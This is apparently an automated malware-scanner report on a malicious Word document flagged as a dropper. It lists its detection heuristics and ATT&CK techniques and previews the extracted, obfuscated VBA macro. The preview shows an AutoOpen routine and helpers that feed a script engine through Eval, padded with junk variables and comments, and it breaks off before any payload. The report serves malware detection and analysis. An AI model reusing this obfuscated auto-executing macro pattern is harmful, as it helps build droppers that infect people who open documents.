MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the CreateObject function, a common technique for executing arbitrary code. The presence of the 'Doc.Dropper.Agent-6460031-0' ClamAV signature further confirms its malicious nature as a dropper. The macro's intent is to likely download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6460031-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6460031-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15534 bytes |
SHA-256: 2a925526c0460a6559e16038bde784a948ee0ac4ce642c06c5d95efe32dec239 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ggunjeqemt(znurivg, vapvaclizy0)
znurivg.Language = vapvaclizy0
End Sub
Sub tatescod(obabhal, qikifretsy9)
obabhal.Eval qikifretsy9
'roughness underpricing glorious london evacuee patois
End Sub
Sub AutoOpen()
Dim ipetnitec
Dim pojune
Dim zbyprut, unvibec2, pumywku3, defnacnu, ifhaxkafwi6, dinhazjoc0, emifjehb, exjiha, enodqacq9, kamexk, ypziwjond8, fjejbyzxopxu0, uzybogrymb, mpupucjy9, oranru, ofnetza4
Dim fjopgysvyw4
Dim mdojcopatd8
'squash abysses predilection minds unlabelled wiles interviewer
Dim vgobqahy, vevuwusdy, rehyty, muzvozig3, idynniq8, uslurwuff7, upixxyfcod4, joqtyf, kpezpewqyf7, ebohve
Dim ircanep, icxeragvob5, jbuwozqel, ukcivdykyg0, stamiszake1, efqitza, anzasim3, efuddon, dmohann, xopilse8
Dim qgigfuld
Dim fakvuzdajba, anybvi8, ewpisutw, kakavce4, acunge0, uwgesisab9, syxhekm8, yqitubi, qdottos, anewzehe, xpilqug, lbyfivgy
Dim ydbotgynsoxr4, otxidgidk, ktakyls1, ohbytty, ejzupxewa8, omwimowni1, udimvuz8, vrubluvlabp8, xehdakukky, lurug0, knipebk, dwachomeqd0, tzorpihedb7
Dim owbujevoq
Dim enopa
'intimidated captures doctoral mountaineering cheep vetoing armless
Dim mullacyt4
Dim yzzunipe
Dim nrosimop6, unviwu2, ygbepvowig1, fufyfgu0, acxyxafd, dkicenolu0, ejriho, bosigxaly, faghugudu, yzpohehi9, abvidpe8, ttajkyno, azpogide7, tetyh4, ycuzalr8, uhlyholu8
Dim uzewqyv
Dim qosan, lzusfysuhme7, zkiniwc, cwufgona, okogixqe5, jowalhuq1, wkadpenv9, egjajfany, evynvu, xkatifrej8, zyzbuq2, rqufolmu, mwitsirqyhh3, etukruzc, yvfoxivy
Dim ufbodob5
'luxuriously scripts rue foreland dipsomaniac multifunction drained sink
Dim xxawaqpawe
Dim fcavyg7
Dim vzuvfupx4, ladnultan, oqyto, ifipytavp, uftucenqi1, umzizzizga5, linonuj, gmammygveta5, vcymsuzmovlu, ubxibfo
Dim zenlyqc4
Dim upaco, arazojtak9, nirsisosg0, emhugi7, omyjonxucm2, lmirahu1, vuzxiloki, ebhiprodk9, yniwi, myrjifkoge7
'calumniate consideration snagged asperity elitism discontinuous fops climber
Dim bicyd
Dim zosyc0
Dim esejto4, heclah1, iracpy0, jlazomhaze0, nzunxot, nlinzyqv, harbeqaz, tvijjowi, zsaseti0, ulexguhfytp4
Dim mulvywe
Dim frivyfy8, eqlimpivno, ylwejo, achuzo, ukwipkezle5, qmymuc, qufepkovv5, syjoj, cnudhym, mufteqre, yqnare, zlixcunn
Dim cubpymmuj, yjazpu0, lexfupxazo, yrygfo0, cxupexd, ydylilpohd4, xywartysj, bcobofy, sewfenacjy3, atnacoqa, mdalwudypa0, atafu3, jaxluk, sfyhcevc, bifvuc6
'jurisprudence denuded ledger stunting insertions
Dim ywono2, exhoku, ofsyca4, ugfetbok7, nebhuxn0, nvysbyboba2, ukyxawepr, secox2, fabbytnori9, olzimban8, ektukecy, reparxu, xyzcebetba8
Dim dewsyk
Dim lzactebevdy
Dim rehwofg, jvinihsygy8, uhjuwvann, bazax7, dwicbesj2, linpeg6, aqhygtenymn8, tnansydte8, klamajihh8, ajuby3, zufitoja, bwazcybizz
Dim erwaqlavre, umydpapvi0, ridpinx6, imdogagr, kwowrohl, sqenovar6, tvujhunzon, neqryxy7, leqxozca1, mytjyda6
'shreds tossing chain abhor tshirt optician percussively microelectronic
Dim ljixdyv7, tofsuve, komownov6, kquvekew0, esjictik8, elgirma, optezore, ivity9, oqdoxog, eqzivkojvo7, yfsywuz0
Dim inoqagg
Dim aqesizi, bobzokfobci, pisyhcuhu3, iwvacymmi, byddybinby, gawlozf2, ifcecosow8, gxojnetqoz, ijqakxogz
Dim fqyxsijvivx1, ajyjah0, xtexudodo, lhucdyh, dmadipkap, yfvydbawx0, osyqmyg, bennisvikha7, amoxnabkuj, akyqbevho
Dim axiwxu0
'beady reduces topography ploughers neutraliser irks raiding coloure
Dim trymogtaby, ytezurdad8, yjpidiqvu, estivsuxni, rxohnogefa, sbugzujv, givaduqba5, ltediwm, yforcawyv6, bjoncywm5, apocop2, fbipmezveqda, wmexmypceb0, ilkoxaqno, ubupdy
Dim qgohhylwopd
Dim itdyvvigqovc
Dim aqifpohhot
Dim fgyhyh
Dim ixumxa9
Dim umsanco
Dim unihenge2
'undertaking disallows controller compiler font gust taped nicety suburbanites
Dim fnefceviqd, qxopowe7, kcybfop, gowhempe, urawqyvz, notu, ohrele1, uktalpyx2, yxodlevr, esxyvbyrbo, osmubm9, q
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.